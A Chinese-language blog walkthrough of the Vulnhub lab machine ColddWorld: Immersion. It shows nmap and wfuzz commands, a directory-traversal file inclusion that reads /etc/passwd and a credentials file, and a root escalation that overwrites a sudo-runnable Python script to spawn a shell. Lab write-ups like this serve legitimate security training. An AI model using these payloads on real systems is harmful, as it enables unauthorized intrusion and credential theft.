首页 > 其他分享 >Vulnhub: ColddWorld: Immersion靶机

Vulnhub: ColddWorld: Immersion靶机

时间:2023-08-07 17:22:50浏览次数:56  
标签:carls DoNotRun .. Immersion py 192.168 Vulnhub ColddWorld txt

kali:192.168.111.111

靶机:192.168.111.183

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.183

image

查看login的源码发现提示:page和文件/var/carls.txt

image

漏洞利用

wfuzz探测account.php页面发现文件包含,参数为page

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.183/login/account.php?FUZZ=../../../../../../../../../../../../../../etc/passwd

image

包含/var/carls.txt发现carls用户账号密码:carls|carlos

http://192.168.111.183/login/account.php?page=../../../../../../../../../var/carls.txt

image

image

提权

查看carls用户sudo权限

image

切换到c0ldd用户后查看sudo权限

sudo -u c0ldd /bin/bash

image

删除/home/c0ldd/目录下的DoNotRun.py,再创建一个同名的python脚本写入提权命令

rm -rf DoNotRun.py
echo 'import os' > DoNotRun.py
echo 'os.system("/bin/bash")' >> DoNotRun.py
sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py

image

标签:carls,DoNotRun,..,Immersion,py,192.168,Vulnhub,ColddWorld,txt
From: https://www.cnblogs.com/ctostm/p/17611944.html

相关文章

  • Vulnhub: DriftingBlues: 6靶机
    kali:192.168.111.111靶机:192.168.111.180信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.180查看robots.txt发现存在目录:/textpattern/textpattern访问后发现是textpatterncms目录爆破发现文件spammer,访问后发现是个压缩包,解压需要密码,......
  • Vulnhub: blogger:1靶机
    kali:192.168.111.111靶机:192.168.111.176信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.176在80端口的/assets/fonts/目录下发现blog目录,访问后发现为wordpress利用wpscan发现wordpress插件wpdiscuz存在任意文件上传漏洞wpscan--urlhtt......
  • Vulnhub: hacksudo: aliens靶机
    kali:192.168.111.111靶机:192.168.111.175信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.175目标80端口backup目录存在文件mysql.bak,下载后查看获得mysql账号密码登录9000端口的phpmyadmin,执行sql语句写入webshellselect'<?phpsystem($......
  • Vulnhub: BlueMoon: 2021靶机
    kali:192.168.111.111靶机:192.168.111.174信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17480端口目录爆破,发现文件:hidden_textgobusterdir-uhttp://192.168.111.174-w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-m......
  • vulnhub_DC_6_wp
    前言靶机地址:https://www.vulnhub.com/entry/dc-6,315/靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip攻击机地址:192.168.20.135靶机探测nmap-sn192.168.20.0/24192.168.20.149为靶机地址端口扫描nmap-p-192.168.20.149详细信息扫描nmap-A-p22,80192.......
  • Vulnhub: Wayne Manor:1靶机
    kali:192.168.111.111靶机:192.168.111.172信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.172根据提示修改hosts文件访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞knock-v192.168.111.172300350400......
  • Vulnhub: shenron:3靶机
    kali:192.168.111.111靶机:192.168.111.171信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.171修改hosts后访问目标80端口,发现是wordpresswpscan收集目标用户,爆破出密码:iloverockyouwpscan--urlhttp://shenron/-euwpscan--urlhttp://......
  • Vulnhub: hacksudo: search靶机
    kali:192.168.111.111靶机:192.168.111.170信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.17080端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.170-w/opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lower......
  • Vulnhub: Coffee Addicts:1靶机
    kali:192.168.111.111靶机:192.168.111.158信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.158访问80端口提示添加域名到hosts文件目录爆破,发现wordpress目录feroxbuster-k-d1--urlhttp://coffeeaddicts.thm-w/opt/zidian/SecLists-2......
  • Vulnhub: HackathonCTF: 2靶机
    kali:192.168.111.111靶机:192.168.111.147信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.147ftp存在匿名登陆,其中存在字典文件80端口目录爆破feroxbuster-k-d1--urlhttp://192.168.111.147-w/opt/zidian/SecLists-2022.2/Discover......